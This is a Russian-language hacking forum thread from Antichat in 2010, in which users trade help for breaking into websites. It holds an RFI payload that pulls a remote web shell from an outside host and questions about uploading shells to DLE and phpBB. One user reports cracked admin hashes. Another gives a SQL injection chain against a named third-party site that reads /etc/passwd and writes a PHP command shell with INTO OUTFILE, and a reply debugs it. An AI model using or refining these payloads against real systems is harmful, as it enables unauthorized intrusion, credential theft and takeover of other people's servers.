HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 12.04.2010, 07:21
kirill1927
Новичок
Регистрация: 12.03.2009
Сообщений: 12
С нами: 9034597

Репутация: 2
По умолчанию

Цитата:
Сообщение от Ctacok  
/bla.php?s=http://disk.re4ka.net/upload/58739714/wso2.jpg.php?
Если же фильтрация на http, заюзай data http://www.xakep.ru/magazine/xa/127/060/1.asp

Цитата:
Warning: require_once() [function.require-once]: URL file-access is disabled in the server configuration
 
Ответить с цитированием

  #2  
Старый 12.04.2010, 17:15
daniel_1024
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
С нами: 8854580

Репутация: 34
По умолчанию

никто не знает как в DLE шелл залить ?!
 
Ответить с цитированием

  #3  
Старый 11.04.2010, 22:50
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию

Если RFI, то можешь залить на хостинг файлик functions.php, и проинклудить его.

Стукни мне в асю 674542, или в ПМ кинь сайт, посмотрю.
 
Ответить с цитированием

  #4  
Старый 12.04.2010, 17:46
mayhem
Новичок
Регистрация: 12.02.2010
Сообщений: 3
С нами: 8549537

Репутация: 0
По умолчанию

Есть Учетка главного модера на phpBB 3.0.7, есть ли уязвимости для получения доступа к админке или заливки шела?
 
Ответить с цитированием

  #5  
Старый 12.04.2010, 17:47
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию

Цитата:
Сообщение от mayhem  
Есть Учетка главного модера на phpBB 3.0.7, есть ли уязвимости для получения доступа к админке или заливки шела?
залить файл даже с правами админа не можешь
 
Ответить с цитированием

  #6  
Старый 12.04.2010, 17:53
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
С нами: 9100556

Репутация: 912
По умолчанию

Цитата:
Сообщение от Konqi  
залить файл даже с правами админа не можешь
https://forum.antichat.ru/showpost.php?p=1176333&postcount=36

Цитата:
Сообщение от Konqi  
не знал,спс

а есть ли возможность во втором версии?
https://forum.antichat.ru/showpost.php?p=198446&postcount=3

Последний раз редактировалось .:[melkiy]:.; 12.04.2010 в 18:31..
 
Ответить с цитированием

  #7  
Старый 12.04.2010, 18:14
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию

Цитата:
Сообщение от .:[melkiy]:.  
https://forum.antichat.ru/showpost.php?p=1176333&postcount=36
не знал,спс

а есть ли возможность во втором версии?

Последний раз редактировалось Konqi; 12.04.2010 в 18:17..
 
Ответить с цитированием

  #8  
Старый 12.04.2010, 18:48
shell_c0de
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
С нами: 8866466

Репутация: 564
По умолчанию

C одного ресурса вытащил хеши от всего от админки от ПМА и от форума и расшифровал (есть и инклуд, вытащил все конфиги тоже) но никуда не пускает, видимо сервер с вебом находится в локалки доступ к ктоторой идет через прокс.
Код:
PORT    STATE  SERVICE    VERSION
22/tcp  closed ssh
80/tcp  open   http-proxy Squid webproxy 2.6.STABLE21
443/tcp closed https
что можно сделать ? как можно обойти ?
 
Ответить с цитированием

  #9  
Старый 12.04.2010, 20:14
papst
Новичок
Регистрация: 26.11.2008
Сообщений: 9
С нами: 9188109

Репутация: -6
По умолчанию

http://mindviz.com/gift.php?id=-717+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17--
тут File_Priv на Y..
http://mindviz.com/gift.php?id=-717+UNION+SELECT+1,2,3,4,5,6,7,8,LOAD_FILE('/etc/passwd'),10,11,12,13,14,15,16,17+from+mysql.user--
путь вроде /home/sites/mindviz/mail/
делаю так
http://mindviz.com/gift.php?id=-717+UNION+SELECT+1,2,3,4,5,6,7,8,<?include($_GET[сmd]);?>,10,11,12,13,14,15,16,17+from+mysql.user+into+ outfile+'/home/sites/mindviz/mail/shell.php'--
что не так..??
http://mindviz.com/shell.php?cmd=phpinfo(); че не идет?
 
Ответить с цитированием

  #10  
Старый 12.04.2010, 20:26
budden
Участник форума
Регистрация: 26.07.2008
Сообщений: 267
С нами: 9364549

Репутация: 184
По умолчанию

papst
Путь неправильный. Вдобавок 9ое поле не выводится. Бери 7ое например.

И надеюсь ты понимаешь, что твой "шелл" делает?

PS into outfile и затем load_file() даже в /tmp/ не проходит.

Последний раз редактировалось budden; 12.04.2010 в 20:32..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.